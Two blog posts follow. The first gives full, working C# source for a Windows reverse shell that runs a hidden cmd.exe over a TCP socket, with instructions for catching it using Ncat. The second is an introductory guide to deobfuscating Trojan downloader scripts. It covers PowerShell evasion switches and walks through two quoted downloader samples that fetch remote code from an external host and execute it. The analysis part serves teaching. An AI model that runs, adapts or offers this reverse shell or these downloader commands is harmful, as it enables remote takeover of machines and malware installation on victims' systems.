Windows Reverse Shell With CSharp

I was quite unfamiliar with the reverse shells so I wanted to understand the concept and learn to make one of my own. I started googling and there were many examples available for Linux environment. However, I wanted to get a reverse shell between two Windows machines. I found one example and that was written with CSharp which was even better: https://medium.com/@Bank_Security/undetectable-c-c-reverse-shells-fab4c0ec4f15

I did not get the sample code to work which had much to do with my lack of understanding. But every failure is a great learning opportunity. I modified the original code and the final code I came up with accepts command line parameters. So here is my CSharp code for reverse shell:

using System;

using System.Text;

using System.IO;

using System.Diagnostics;

using System.Net.Sockets;

namespace RevShell

{

    class Program

    {

        static StreamWriter streamWriter;

        static Process p;

        // https://medium.com/@Bank_Security/undetectable-c-c-reverse-shells-fab4c0ec4f15

        // https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc

        static void Main(string[] args)

        {

            TcpClient client = null;

            Stream stream;

            StreamReader streamReader;

            StringBuilder strInput;

            string ipAddress = "127.0.0.1";

            int port = 0;

            // Commandline has IP and port number

            if(args.Length == 2)

            {

                ipAddress = args[0];

                if (int.TryParse(args[1], out port))

                {

                    // Port number 1 - 65535

                    if (port < 1 || port > 65535) port = 80;

                }

            } // Commandline has port number

            else if(args.Length == 1)

            {

                if(int.TryParse(args[0], out port))

                {

                    // Port number 1 - 65535

                    if (port < 1 || port > 65535) port = 80;

                }

            }

            if (port == 0) port = 80; // Use default

            try

            {

                // Connect to host

                client = new TcpClient(ipAddress, port);

                Console.WriteLine("Connecting: " + ipAddress + ":" + port);

            }

            catch(Exception ex)

            {

                Console.WriteLine("Exception: " + ex.Message);

                return;

            }

            stream = client.GetStream();

            streamReader = new StreamReader(stream);

            streamWriter = new StreamWriter(stream);

            strInput = new StringBuilder();

            // Create and start a shell in the client machine, redirect I/O to host machine

            p = new Process();

            p.StartInfo.FileName = "cmd.exe";

            p.StartInfo.CreateNoWindow = true;

            p.StartInfo.UseShellExecute = false;

            p.StartInfo.RedirectStandardOutput = true;

            p.StartInfo.RedirectStandardInput = true;

            p.StartInfo.RedirectStandardError = true;

            p.OutputDataReceived += new DataReceivedEventHandler(CmdOutputDataHandler);

            p.Start();

            p.StandardInput.AutoFlush = true;

            p.BeginOutputReadLine();

            while (true)

            {

                try

                {

                    string line = streamReader.ReadLine();

                    if (!string.IsNullOrEmpty(line))

                    {

                        p.StandardInput.WriteLine(line);

                    }

                }

                catch(Exception ex)

                {

                    Console.WriteLine("Exception: " + ex.Message);

                    break;

                }

            }

        }

        private static void CmdOutputDataHandler(object sendingProcess, DataReceivedEventArgs outLine)

        {

            StringBuilder strOutput = new StringBuilder();

            if (!String.IsNullOrEmpty(outLine.Data))

            {

                try

                {

                    string line = outLine.Data;

                    if(!string.IsNullOrEmpty(line))

                    {

                        streamWriter.WriteLine(line);

                        streamWriter.Flush();

                    }

                }

                catch (Exception ex)

                {

                    Console.WriteLine("Exception: " + ex.Message);

                }

            }

        }

    }

}

As this is a purely proof-of-concept code, it does not have any persistence or stealthy features.

The reverse shell contains two parts. First part is the shell itself which in the code above is cmd.exe. The second part is the communication from the "victim" machine back to caller's "server" which is done with the TCP Socket. Command shell is started as a new process and the process' standard input, output and error streams are redirected to the TCP Socket which in turn sends them to the caller.

The next problem was the "server" or caller side. There had to be some way to connect to the same TCP Socket. Every example I found used Linux's netcat command for this. With some more googling I found out that NMAP contains a Windows implementation of the netcat. So I downloaded Ncat utility: https://nmap.org/ncat/

Finally I had every piece I needed and the reverse shell worked like a charm :)

Start Ncat with -l and -v options to get it to listen mode and verbose mode.

Start reverse shell in the "victim" machine.

Deobfuscating Trojan downloader scripts i.e. basics to get you started

This is an entry level view to understand scripting used by downloaders and by other malware. I assume no previous knowledge of scripting and the goal is to make the reader familiar with this topic. First I introduce scripting engines (shells) commonly used by downloaders. At the end I provide a few step-through of selected samples.

Commands and command line switches found in malware

First a few words about notation:

·        * DOS commands may use either forward slash (/) or hyphen (-) as a switch character, so cmd.exe /c and cmd.exe -c are the same commands. Powershell uses only hyphen (-)

·        * commands are written in lowercase, if possible. In the real samples, it is common that they are written in mixed case for example: C:\WiNDOws\sYStEm32\CMD.EXE /C. In general the scripting languages are case-insensitive

·        * Powershell has a "standard form" for commands for example Invoke-Command which may be written as invoke-command in this document

·        * as a rule of thumb DOS and Vbscript use double-quotes with strings and Powershell uses single-quotes. There are however exceptions for this rule

DOS Commands

cmd.exe /c [string]

/c   Carries out the command specified by string and then terminates command shell.

start.exe /b [string]    Starts a separate window to run a specified program or command

/b   Start application without creating a new window

Powershell

About notation:

·         commands and command switches are represented both with their shortest and full form for example -w[indowstyle] means that the switch can be between -w and -windowstyle and it may contain any number of characters from [indowstyle] part like -wind

powershell -noexit -nol  -noninteractiv  -noprofile  -execution  bypass  -windows hidden [string] |IEX

-noe[xit]                      Doesn't exit after running commands

-nol[ogo]                     Hides the copyright banner at startup

-noni[nteractive]         Doesn't present an interactive prompt to the user

-nop[rofile]                 Doesn't load the PowerShell profile

-ex[ecutionpolicy]      Sets the default execution policy for the current session and saves it in the          $env:PSExecutionPolicyPreference environment variable. Value bypass: nothing is blocked and there are no warnings or prompts.

-w[indowstyle]           Sets the window style for the session. Value hidden: no window is shown

[string]                       A command string or script block

IEX                            Invoke-Expression command

powershell.exe -nop -w hidden -c [string]

-c[ommand]             Executes the specified commands (with any parameters) as though they were typed at the PowerShell command prompt.

powershell -nop -sta -w 1 -enc [string]

-sta                           Starts PowerShell using a single-threaded apartment. This is usually obsolete setting to distract analysis

-e[ncodedcommand] Accepts a base-64-encoded string as a command

-w 1                          Same as -windows hidden, now the value hidden is replaced with a numeric constant

A sample step-through

Here is a very simple downloader sample which I found at Pastebin.

powershell.exe -nop -w hidden -c $l=new-object net.webclient;$l.proxy=[Net.WebRequest]::GetSystemWebProxy();$l.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $l.downloadstring('http://192.168.0.10:8080/E1Y8TdrQEfw');

For the sake of clarity I have divided a single long string with linebreaks. I have also added linenumbers.

1. powershell.exe -nop -w hidden -c

2. $l=new-object net.webclient;

3. $l.proxy=[Net.WebRequest]::GetSystemWebProxy();

4. $l.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;

5. IEX $l.downloadstring('http://192.168.0.10:8080/E1Y8TdrQEfw');

Steps:

1. Invoke Powershell with no execution policy, hidden window and execute following commands

2. Create a WebClient object and assign object to variable l

3. Assign proxy settings to variable I's proxy property

4. Set proxy credentials

5. Invoke expression "I.downloadstring" which has string parameter 'http://192.168.0.10:8080/E1Y8TdrQEfw'

Here is another sample from Pastebin.

Set usdbzw = CreateObject("WScript.Shell")

usdbzw.Run "powershell $gscbut = New-Object -ComObject Msxml2.XMLHTTP; $hgttbdy = New-Object -ComObject ADODB.Stream; $zteyxhj = $env:temp + '\Dropbo.exe';$gscbut.open('GET', 'http://team.hitweb.it/tes2t?12143', $false);$gscbut.send(); if($gscbut.Status -eq "200"){$hgttbdy.open();$hgttbdy.type = 1;$hgttbdy.write($gscbut.responseBody);$hgttbdy.position = 0;$hgttbdy.savetofile($zteyxhj);$hgttbdy.close();} Start-Process $zteyxhj;",0, true

Here is the sample with linebreaks and linenumbers.

1.  Set usdbzw = CreateObject("WScript.Shell")

2.  usdbzw.Run

3.    "powershell

4.    $gscbut = New-Object -ComObject Msxml2.XMLHTTP;

5.    $hgttbdy = New-Object -ComObject ADODB.Stream;

6.    $zteyxhj = $env:temp + '\Dropbo.exe';

7.    $gscbut.open('GET', 'http://team.hitweb.it/tes2t?12143', $false);

8.    $gscbut.send();

9.    if($gscbut.Status -eq "200")

10.     {$hgttbdy.open();

11.      $hgttbdy.type = 1;

12.      $hgttbdy.write($gscbut.responseBody);

13.      $hgttbdy.position = 0;

14.      $hgttbdy.savetofile($zteyxhj);

15.      $hgttbdy.close();}

16.   Start-Process $zteyxhj;"

17. ,0, true

Steps:

1.-2. and 17. Create VBScipt shell object and execute string. Create no window and wait the script to finish

3. The string contains Powershell script

4. Create XMLHTTP object

5. Create ADODB.Stream object

6. Create a temporary file %TEMP%\Dropbo.exe

7.-8. Open HTTP connection

9. Check if the connection was established

10.-15. Read the HTTP response stream and write it to temporary file %TEMP%\Dropbo.exe

16. Execute %TEMP%\Dropbo.exe